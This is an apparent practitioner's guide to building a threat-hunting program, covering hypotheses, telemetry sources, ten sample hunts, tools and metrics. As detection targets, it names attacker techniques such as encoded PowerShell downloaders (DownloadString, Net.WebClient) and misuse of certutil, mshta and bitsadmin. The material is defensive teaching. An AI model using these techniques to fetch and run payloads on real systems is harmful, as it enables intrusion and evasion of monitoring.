Introduction
Your SIEM generates alerts. Your EDR generates alerts. Your firewall generates alerts. You triage them, you respond to them, you close them. And then one day you discover that an attacker has been in your network for six months, exfiltrating data through a channel that never triggered an alert. The median dwell time for undetected breaches is still measured in months, not days — IBM's 2024 Cost of a Data Breach report puts the global average at 194 days. This is the problem threat hunting solves.
I have built threat hunting programs at three organizations of different sizes, and I can tell you with certainty: the single most effective security investment a mid-size company can make — after basic hygiene like MFA and patching — is proactive threat hunting. Not because the tools are expensive (they are not), but because it fundamentally changes how your security team thinks about threats.
What Threat Hunting Actually Is (and Is Not)
Threat hunting is not alert triage. It is not running automated scans. It is not checking dashboards. It is not scrolling through SIEM queries hoping something looks wrong. Threat hunting is the proactive, hypothesis-driven search for threats that have evaded your existing detection capabilities. It starts with a question, uses data to answer that question, and results in either a confirmed threat or an improved understanding of your environment.
The critical distinction: alert-driven security is reactive — something fires, you investigate. Threat hunting is proactive — you go looking for adversary behavior before any alert fires. Your SIEM rules and EDR signatures were written for known threats. Threat hunting finds the unknown ones.
Here is a concrete example. Last year, during a routine threat hunt at a manufacturing client, I hypothesized that an adversary might use legitimate remote management tools (like AnyDesk or ScreenConnect) as an alternative to traditional C2. I queried EDR telemetry for processes with those tool names running on systems where they were not deployed by IT. We found ScreenConnect installed on three workstations in the engineering department — installed by an attacker who had phished an engineer four weeks earlier. No alert had fired because ScreenConnect is a legitimate tool. Without the hunt, that access would have persisted for months.
The Three Hunting Models
Not every organization hunts the same way. The three primary models — intelligence-driven, analytics-driven, and situational awareness — each have strengths and appropriate use cases.
Intelligence-driven hunting starts with external threat intelligence. You learn that a particular APT group is targeting your industry using a specific technique — say, DLL search order hijacking in Microsoft Teams. You build a hypothesis: "Is there evidence of DLL search order hijacking on endpoints running Microsoft Teams in our environment?" Then you write queries against your EDR or SIEM to test that hypothesis. This model works best when you have access to quality threat intelligence that is specific to your industry and threat profile.
Analytics-driven hunting starts with your own data. Instead of looking for specific adversary techniques, you look for statistical anomalies — behaviors that deviate from your environment's baseline. A workstation that suddenly makes 10,000 DNS queries in an hour. A service account that authenticates from an IP it has never used before. A process that writes to the Windows Registry in a pattern inconsistent with its normal behavior. This model works best when you have rich telemetry and baseline data to compare against.
Situational awareness hunting is triggered by changes in your environment. You just completed an acquisition and merged networks. You just deployed a new application. A critical vendor reported a breach. A former employee with domain admin access was terminated. Each of these situations creates a window of elevated risk that warrants proactive investigation. This model works best as a complement to the other two.
The Hypothesis-Driven Hunting Framework
Every successful hunt follows a structured process. Skip any step and the hunt loses value.
Step 1: Formulate the hypothesis. A good hypothesis is specific, testable, and grounded in threat intelligence or environmental knowledge. "Bad things might be happening" is not a hypothesis. "An attacker may be using PowerShell encoded commands to download and execute payloads from external domains on workstations in the finance department" — that is a hypothesis you can test.
Step 2: Identify required data sources. For the hypothesis above, you need: PowerShell script block logging or Sysmon events capturing command-line arguments, DNS query logs or proxy logs to identify external domain resolution, and endpoint process creation events showing parent-child relationships. If you do not have one of these data sources, document the gap and either acquire the data or adjust the hypothesis.
Step 3: Build and execute queries. Translate your hypothesis into concrete queries. For the PowerShell example: query for processes where the command line contains -EncodedCommand or -enc or Base64-encoded strings. Cross-reference the decoded commands against known malicious patterns — Invoke-WebRequest, Net.WebClient, DownloadString. Filter out known-good automated scripts by correlating against your IT automation inventory.
Step 4: Analyze results. This is where human expertise matters. A query might return 500 results. Most are legitimate automation — SCCM scripts, monitoring tools, IT maintenance. The one that is an attacker hiding in the noise requires an analyst who understands what normal looks like and can spot what does not belong.
Step 5: Document and close. Whether the hunt found a threat or not, document everything: the hypothesis, data sources used, queries executed, results, analysis, and conclusions. Negative results are valuable — they confirm your environment is clean against a specific technique and create a methodology that future hunters can reuse.
Essential Data Sources for Threat Hunting
You cannot hunt without data. The quality and completeness of your telemetry directly determines what threats you can find. Here are the data sources I consider essential, ordered by priority:
Endpoint Detection and Response (EDR) telemetry. Process creation events with full command-line arguments, file writes, registry modifications, network connections per process, and module loads. This is the single most valuable data source for threat hunting. If you have nothing else, start here. CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, and Carbon Black all provide this.
Authentication and identity logs. Every successful and failed login, every privilege escalation, every group membership change, every service account authentication. Windows Security Event Logs (IDs 4624, 4625, 4648, 4672, 4720, 4732), Active Directory audit logs, Entra ID sign-in logs, and Okta system logs. These show you who is accessing what, from where, and when — the foundation for detecting lateral movement and credential abuse.
DNS query logs. Every DNS query from every endpoint and server, with the source IP and the response. DNS is the nervous system of your network, and it is abused by virtually every category of threat — C2 beaconing, data exfiltration, DGA-based malware, and reconnaissance. Enable DNS logging on your resolvers (Windows DNS Server, Infoblox, Pi-hole) or deploy a passive DNS collector.
Network flow data. NetFlow, sFlow, or IPFIX from your core switches and routers. Flow data shows you traffic volumes, connection patterns, and communication relationships between hosts. It does not show payload content, but it reveals lateral movement, data exfiltration patterns, and C2 beacon intervals through traffic analysis.
Proxy and firewall logs. HTTP/HTTPS requests with URLs, user agents, and byte counts. Firewall connection logs with allow/deny decisions. These show you what your endpoints are talking to on the internet and help identify connections to suspicious infrastructure — newly registered domains, free hosting providers, and known C2 infrastructure.
Ten Practical Hunt Ideas You Can Run This Week
You do not need months of preparation to start hunting. Here are ten hunts that produce results with data most organizations already have:
1. Persistence mechanism audit. Query for scheduled tasks, Windows services, registry run keys, startup folder entries, and WMI event subscriptions created in the last 30 days. Compare against your IT change management records. Anything that does not match a documented change warrants investigation.
2. Unusual parent-child process relationships. Excel spawning PowerShell. Word spawning cmd.exe. Outlook spawning a script interpreter. These are classic indicators of macro-based attacks. Query your EDR for unexpected parent-child relationships and investigate any that do not match known business processes.
3. Service account anomalies. Service accounts should authenticate from a predictable set of hosts. Query authentication logs for service accounts that authenticated from new or unusual hosts in the last 7 days. An attacker who compromises a service account will use it from a different location than its legitimate usage.
4. DNS query volume spikes. Identify endpoints that made significantly more DNS queries than their historical baseline. A sudden spike in DNS queries — especially to a single domain or to many unique domains — can indicate DNS tunneling, DGA-based malware, or data exfiltration over DNS.
5. Living-off-the-land binary (LOLBin) usage. Hunt for unusual use of legitimate Windows binaries: certutil.exe downloading files, mshta.exe executing scripts, bitsadmin.exe creating transfer jobs, rundll32.exe loading DLLs from unusual paths. These are the tools attackers use when they want to avoid dropping malware.
6. Lateral movement patterns. Query for RDP sessions between workstations (workstation-to-workstation RDP is almost always suspicious), PsExec or WMI remote execution between non-admin systems, and SMB file shares accessed by accounts that have never accessed them before.
7. Data staging and exfiltration. Look for large files created in temporary directories, unusual archiving activity (rar.exe, 7z.exe, tar), and large outbound data transfers to cloud storage providers (Mega, Google Drive, Dropbox) from hosts that do not normally access those services.
8. Newly registered domain connections. Cross-reference your proxy logs against domain WHOIS data to identify connections to domains registered in the last 30 days. Legitimate businesses rarely use brand-new domains. Attackers register new infrastructure for every campaign.
9. Anomalous authentication timing. Identify accounts that authenticate outside their normal working hours. An analyst who normally works 9 AM to 6 PM authenticating at 3 AM from a new location is suspicious. This does not prove compromise, but it warrants a phone call.
10. Certificate anomalies in TLS traffic. Hunt for outbound TLS connections to servers using self-signed certificates, certificates with unusually short validity periods (common with Let's Encrypt abuse), or certificates whose subject does not match the domain. Many C2 frameworks use TLS with lazy or misconfigured certificates that stand out from legitimate traffic.
Tools for Threat Hunting
You do not need a dedicated threat hunting platform to start, but the right tools make hunting more efficient and scalable.
Your SIEM. Splunk, Elastic Security, Microsoft Sentinel, Google Chronicle — whatever you already have. The hunting platform is wherever your logs are aggregated. Learn your SIEM's query language well enough to write complex correlations, and save your hunting queries as reusable templates.
Velociraptor. An open-source endpoint visibility and forensics tool that lets you run VQL (Velociraptor Query Language) queries across your entire endpoint fleet in minutes. It is the closest thing to having a forensic analyst on every machine simultaneously. Free, powerful, and purpose-built for hunting.
MITRE ATT&CK Navigator. Use it to map your hunting coverage against the ATT&CK matrix. Color-code techniques by hunting status: green for hunted and validated, yellow for hunted with partial coverage, red for not yet hunted. This creates a visual roadmap for your hunting program.
Jupyter Notebooks. For analytics-driven hunting, Jupyter notebooks let you combine data analysis, visualization, and documentation in a single artifact. Query your SIEM API, analyze the results with pandas, visualize patterns with matplotlib, and document your methodology — all in one reproducible document.
Sigma rules. Sigma is a generic signature format for SIEM systems. The community-maintained Sigma rule repository contains hundreds of detection rules mapped to ATT&CK techniques. Use them as starting points for hunts — convert a Sigma rule into a query, run it against your data, and analyze the results.
Building a Sustainable Hunting Program
You do not need a dedicated hunting team to start. Allocate 20% of your senior analyst's time to hunting — one day per week, they put aside alerts and go looking for threats proactively. The first hunt that finds something your automated detection missed will justify the investment ten times over.
As your program matures, formalize it. Establish a hunting cadence — weekly hunts for tactical priorities, monthly hunts for strategic threats, and ad-hoc hunts triggered by new intelligence or environmental changes. Maintain a hunt log that tracks hypotheses, data sources, findings, and outcomes. Share findings across the team so institutional knowledge does not depend on a single person.
Every hunt that finds nothing still has value: it validates your security posture against a specific threat, creates a reusable methodology, and builds your team's analytical skills. Every hunt that finds something is a detection that your automated tools missed — fix the detection gap, and your security posture improves permanently.
Measuring Hunting Program Effectiveness
Metrics matter for sustaining executive support and measuring improvement over time. Track these:
Hunts completed per quarter. Volume matters because hunting is a numbers game — the more hypotheses you test, the more likely you are to find something. Aim for 10-15 hunts per quarter per full-time hunter.
Mean time to detect (MTTD) for hunt-discovered threats versus alert-discovered threats. Hunting typically catches threats earlier in the kill chain, which translates directly to reduced business impact.
New detections created from hunt findings. Every hunt that reveals a detection gap should result in a new SIEM rule or EDR detection. Track how many hunts convert into permanent detection improvements — this is the compounding return on your hunting investment.
ATT&CK coverage expansion. Measure the percentage of ATT&CK techniques you have hunted for over the past year. This shows strategic progress toward comprehensive threat coverage.
Threat hunting transforms your security posture from reactive to proactive, from alert-dependent to intelligence-driven. It finds what your tools miss, builds your team's expertise, and continuously improves your detection capabilities. The adversaries are already in networks — the question is whether you go looking for them before they achieve their objectives.








